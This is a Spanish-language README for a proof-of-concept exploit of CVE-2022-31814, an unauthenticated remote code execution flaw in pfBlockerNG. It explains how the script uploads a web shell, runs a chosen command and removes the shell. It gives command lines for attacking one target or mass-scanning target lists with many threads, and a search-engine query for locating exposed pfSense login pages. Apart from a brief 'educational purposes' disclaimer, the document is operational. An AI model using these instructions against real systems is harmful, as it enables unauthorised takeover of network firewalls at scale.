
pfBlockerNG <= 2.1.4_26 RCE sin autenticación (CVE-2022-31814)
Este script es una prueba de concepto de exploit para pfBlockerNG <= 2.1.4_26 que permite la ejecución remota de código. Toma una única URL objetivo o una lista de URLs, sube un shell, ejecuta un comando y luego elimina el shell.
Este script requiere Python 3.x y los módulos requests y concurrent.futures instalados. Puedes instalar estos módulos ejecutando:
pip3 install requests concurrent.futures
o
pip3 install -r requirements.txt
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Console Command ('id')
-l LIST, --list LIST List of targets (list.txt)
-i IP, --ip IP Base target uri (ex. http://target-uri/)
-t THREADS, --threads THREADS
Number of threads for mass scan
-o OUTPUT, --output OUTPUT
Output file (vuln.txt)
Para explotar un único objetivo, usa la opción -i o --ip y especifica la URL base o la dirección IP:
python3 exploit.py -i http://target-uri/ -c 'id'
Para escanear una lista de objetivos, usa la opción -l o --list y especifica la ruta al archivo:
python3 exploit.py -l list.txt -c 'id' -t 50
La opción -t o --threads se puede usar para especificar el número de hilos a utilizar en el escaneo.
Si se especifica la opción -o o --output, la lista de objetivos vulnerables se escribirá en un archivo:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
Este script es solo con fines educativos. Úsalo bajo tu propio riesgo.